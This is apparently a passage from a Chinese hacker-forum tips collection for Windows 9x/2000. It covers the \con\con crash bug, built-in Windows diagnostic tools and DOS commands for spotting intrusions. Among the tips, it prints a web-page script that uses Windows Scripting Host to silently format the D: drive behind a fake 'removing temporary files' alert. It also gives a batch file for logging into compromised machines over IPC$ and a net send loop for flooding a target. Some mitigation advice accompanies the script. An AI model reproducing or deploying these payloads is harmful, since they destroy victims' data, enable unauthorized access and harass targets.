   WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击，倒是98死机。原理：我们知道，CON是DOS下的特殊设备名，不允许做文件名，如果我们在DOS下键入如下命令：copy coldcrysky.txt con，系统会显示coldcrysky.txt的内容，如果换成：copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN，则输出coldcrysky.txt到打印机。由此可见，CON代表文件本身，如果使用\CON\CON命令，则意味着系统不断调用文件本身，视系统资源迅速枯竭，连按CTRL+ALT+DEL的机会都没有～
解决办法：
对于9X系统，强烈建议打补丁！！！2000和XP则不会死机～

D、格式化硬盘：（最恐怖的～～～慎用！！！请勿用于非法用途！！！使用后如果有任何负作用，后果自负！与 *** 『ColdCrySky』；乱刀留影无关！！！）

scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm";
scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'>"
WSH.rUN('start/m format.com d:/q/autotest/u');
alert('IMPORTANT : Windows is removing unused temporary files.');
scr.write();

说明：当您浏览了网页，会把startup.hta文件写入启动文件夹，并提示WINDOWS正在删除临时文件！实际上是在格式化你的D盘，代码中的：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对应为：Windows Scripting Host Shell Object。代码中的：WSH全称是：Windows Scripting Host，是微软的一种基于32位系统平台与语言无关的教本解释机制，它使得脚本能在WINDOWS桌面或命令提示符下运行～WSH所对应的程序WScript.exe是一个脚本语言解释器，位于WINDOWS所在文件夹下，所以它可以像执行批处理文件一样执行WSH脚本程序～
解决方法：1）更新您的浏览器，使用最新的浏览器上网！
2）修改msdos.sys，在其中加入：Bootmentu=0命令行，目的是禁用启动菜单。
3）吧format.com改名
4）禁用WSH。具体方法：在win98中，从添加删除程序中点击WINDOWS安装程序，打开附件一项，将WINDOWS SCRIPTING HOST前面的选项去掉，就可以卸载掉WSH了～～～win2000和xp的用户可以在我的电脑—工具菜单—文件夹选项—选择文件类型，找到VBS VBSCRIPT FILE选项，点击删除！


×××××××××××××××××××××××××××××××××××××××××××××

   29）系统自带的系统工具

   其实无论大家从什么地方，什么方法找到一些好用的工具，都不如Windows自带的工具用着方便（假设你区的地方正好不能上网，而你又没有准备好这些工具，那怎么办？呵呵，不用着急，用好下面几个Windows自带的小工具，可以使你事半功倍！）

1、msinfo32.exe

位于C:\Program Files\Common Files\

Microsoft Shared\Msinfo\msinfo32.exe，显示计算机中的有关系统信息，可用其诊断、解决计算机问题并查看远程系统所生成的系统报告。

2、drwatson.exe    ——这个工具给我特别的亲密感觉：第一次使用这个工具是在看了LK007大哥给cool兄弟的回复以后，我马上试验～果然很有意思！LK007不愧是大哥！现在想起来都佩服不已~~~

位于C: \Windows \drwatson.exe，当某个应用程序在运行过程中出错时，它就会将出错的程序以及出错的内存地址一一记录下来，并保存为Windows的Drwatson子目录下的*.wlg记录文件。

3、sfc.exe

位于C:\Windows\System\sfc.exe，用于自动搜索被改变、删除或损坏了的系统文件。

4、msconfig.exe

位于C:\Windows\System\msconfig.exe，通过修改启动方式以及启动时运行哪些应用程序等系统配置，从而达到快速排除故障的目的。

5、scanreg.exe

位于C:\windows\command\scanreg.exe（DOS版本）及C:\windows\scanregw.exe（Windows版本），用于检查、修复、备份以及还原系统注册表及相关配置文件的工具软件，防止因注册表数据被破坏而导致的系统故障。

6、vcmui.exe

位于C:\Windows\vcmui.exe，在后台自动将被覆盖的驱动程序备份下来，当我们安装的新驱动出错时可用它进行恢复。

7、winrep.exe

位于C:\Windows\winrep.exe，能自动收集有关系统信息并提示用户输入故障所在，帮我们编写一篇完整的“求援”报告，并将其发送给有关技术维护人员，简化“求援”操作。

   这七个Windows自带的小程序可以在开始菜单——运行中直接输入文件名（无需输入扩展名）调出该程序！

×××××××××××××××××××××××××××××××××××××××××××××

   30）这两天始终有朋友问我如何在98下关闭自己的某一个端口

   呵呵，解释了半天也没解释清楚，干脆做了个动画教程。。。可是那位朋友看完后仍然说看不懂。。。唉~~~或许我做动画教程的水平都不行么？？？这里把地址帖出来，感兴趣的朋友可以下载看看~~~为了考虑动画教程的大家小关系，画质不是很清晰，大家凑合看吧~~~明白道理就可以了！这是最最最基础的东西了！也是最最最简单的了~~~关闭端口有很多种方法，这里我只演示了一种！另外，根据动画教程，大家可以自己试试做一个能显示好友IP的QQ（开动一下脑筋！过几天我告诉大家怎么制作！^_^）

   下载地址：http://dahubaobao1@dahubaobao1.3322.net/pingbiduankou.rar

×××××××××××××××××××××××××××××××××××××××××××××

   31）批处理在入侵中的几则妙用！

   A、简化IPC$登陆肉鸡的操作：

   用记事本建立一个名字为：ipcruqin.bat的批处理文件，内容如下：

   @net use \\%1\ipc$ %3 /u:"%2"
   @echo OK！已经成功建立连接

   之后，大家在CMD下输入：ipcruqin.bat 肉鸡IP 肉鸡的admin帐号/用户的密码。就可以登陆上去了，而不需要那一大长串的命令了！

   B、批处理轰炸对方电脑：

   打开一记事本，在里面输入如下内容：

   @echo 正在轰炸中……
   :start
   @net send %1 %2
   @if errorlevel 1 goto over
   goto start
   :over
   @echo 发送失败

   将其保存为bat格式的文件即可，使用方法：*.bat（该批处理文件的名字）+ 空格 + 目标IP + 空格 + 你要对他说得话！

   这次先简单介绍这三个！等下次有机会再给大家介绍更多的批处理文件的用途！

×××××××××××××××××××××××××××××××××××××××××××××

   32）再说几个非常简单实用的DOS命令（工具）：

   A、fport.exe ——查看那些端口都是那些程序使用的命令。

   B、netstat -an ——查看那些端口于外部的IP连接。比如这里显示 ：23 XX.XX.XX.XX 而你又没有开23端口，那么，呵呵……还用我说么？

   C、letmain.exe \\ip -admin -d ——列出本机的administrators组的用户名查看是否有异常。

   D、pslist.exe ——列出进程

   E、pskill.exe ——杀掉进程，有时候再任务管理器中无法终止程序，那就用这个工具来停止进程。

   F、login.exe ——列出当前有那些用户登陆再你的机器上。